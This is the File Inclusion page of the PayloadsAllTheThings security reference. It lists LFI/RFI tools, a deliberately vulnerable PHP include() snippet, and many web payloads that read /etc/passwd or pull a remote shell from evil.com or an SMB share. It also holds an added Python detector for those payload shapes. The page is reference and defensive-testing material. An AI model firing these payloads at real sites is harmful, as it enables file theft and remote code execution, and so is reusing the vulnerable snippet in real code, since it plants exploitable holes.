PayloadsAllTheThings/File Inclusion/README.md

# File Inclusion
> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
## Summary
- [Tools](#tools)
- [Local File Inclusion](#local-file-inclusion)
    - [Null Byte](#null-byte)
    - [Double Encoding](#double-encoding)
    - [UTF-8 Encoding](#utf-8-encoding)
    - [Path Truncation](#path-truncation)
    - [Filter Bypass](#filter-bypass)
- [Remote File Inclusion](#remote-file-inclusion)
    - [Null Byte](#null-byte-1)
    - [Double Encoding](#double-encoding-1)
    - [Bypass allow_url_include](#bypass-allow_url_include)
- [Labs](#labs)
- [References](#references)
## Tools
* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - Kadimus is a tool to check for and exploit LFI vulnerabilities.
* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool
## Local File Inclusion
**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. Path Traversal allows an attacker to read a file, usually by abusing a "reading" mechanism implemented in the target application, whereas File Inclusion leads to the execution of arbitrary code.
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
```php
<?php
// Vulnerable on purpose: the user-controlled `page` parameter is passed straight to include()
$file = $_GET['page'];
include($file);
?>
```
In the following examples we include the `/etc/passwd` file; check the `Directory & Path Traversal` chapter for more interesting files.
```powershell
http://example.com/index.php?page=../../../etc/passwd
```
### Null Byte

:warning: In versions of PHP below 5.3.4 we can terminate the path with a null byte (`%00`).

```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```
**Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470
```ps1
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
```
### Double Encoding
```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### UTF-8 Encoding
```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```
### Path Truncation
On most PHP installations a filename longer than `4096` bytes is cut off, so any excess characters are discarded.

```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```
### Filter Bypass
```powershell
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
## Remote File Inclusion
> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
Remote File Inclusion no longer works on a default configuration, because `allow_url_include` has been disabled by default since PHP 5. The option has to be enabled explicitly in `php.ini`:

```ini
; php.ini: remote includes only work when this is On (the default is Off)
allow_url_include = On
```
Most of the filter bypasses from the LFI section can be reused for RFI.

```powershell
http://example.com/index.php?page=http://evil.com/shell.txt
```
### Null Byte
```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00
```
### Double Encoding
```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off`, it is still possible to include a remote file on a Windows box using the `smb` protocol.

1. Create a share open to everyone
2. Write PHP code inside a file: `shell.php`
3. Include it: `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
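Added detection example, written for this page and not part of the PayloadsAllTheThings project: it normalizes the `page` parameter the way the LFI bypasses above require (repeated percent-decoding for double encoding, folding the overlong UTF-8 `%c0%ae`/`%c0%af` forms) and then flags null bytes, traversal, the 4096-byte truncation shape, the `....//` filter-bypass form, and the RFI and `\\host\share` shapes from this section. The sample requests are constructed from the payload shapes on this page; the parameter name `page` follows the vulnerable script above.

```python
import re
from urllib.parse import urlparse, unquote_to_bytes
# Constructed sample requests modelled on the payload shapes in this page; not real traffic.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=../../../etc/passwd%00",
    "/index.php?page=%252e%252e%252fetc%252fpasswd",
    "/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
    "/index.php?page=....//....//etc/passwd",
    "/index.php?page=../../../etc/passwd" + "/." * 2100,  # path-truncation shape
    "/index.php?page=http:%252f%252fevil.com%252fshell.txt",
    "/index.php?page=\\\\10.0.0.1\\share\\shell.php",
]

TRAVERSAL = re.compile(rb"\.\.[\\/]")
REMOTE_SCHEME = re.compile(rb"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def raw_param(request: str, name: str) -> str:
    """Return the parameter undecoded, so encoding tricks stay visible."""
    for pair in urlparse(request).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return ""

def normalize(value: str, max_rounds: int = 3) -> tuple[bytes, int, bool]:
    """Percent-decode until stable, then fold overlong UTF-8 '.'/'/' (%c0%ae, %c0%af)."""
    data, rounds = value.encode("latin-1", "replace"), 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    overlong = b"\xc0\xae" in data or b"\xc0\xaf" in data
    return data.replace(b"\xc0\xae", b".").replace(b"\xc0\xaf", b"/"), rounds, overlong

def classify(request: str, param: str = "page") -> list[str]:
    """List the file-inclusion indicators found in one request's include parameter."""
    data, rounds, overlong = normalize(raw_param(request, param))
    checks = [
        ("traversal", TRAVERSAL.search(data) is not None),
        ("null_byte", b"\x00" in data),
        ("double_encoding", rounds > 1),         # needed more than one decode pass
        ("overlong_utf8", overlong),
        ("path_truncation", len(data) > 4096),   # the PHP limit cited above
        ("remote_include", REMOTE_SCHEME.match(data) is not None),
        ("unc_path", data.startswith(b"\\\\")),  # \\host\share form used with SMB
    ]
    return [name for name, hit in checks if hit]
```

Run `classify` over each entry of `SAMPLE_REQUESTS`: the clean `about` request yields no indicators, every other one yields at least one.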
## Labs
* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)
## References
* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
* [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)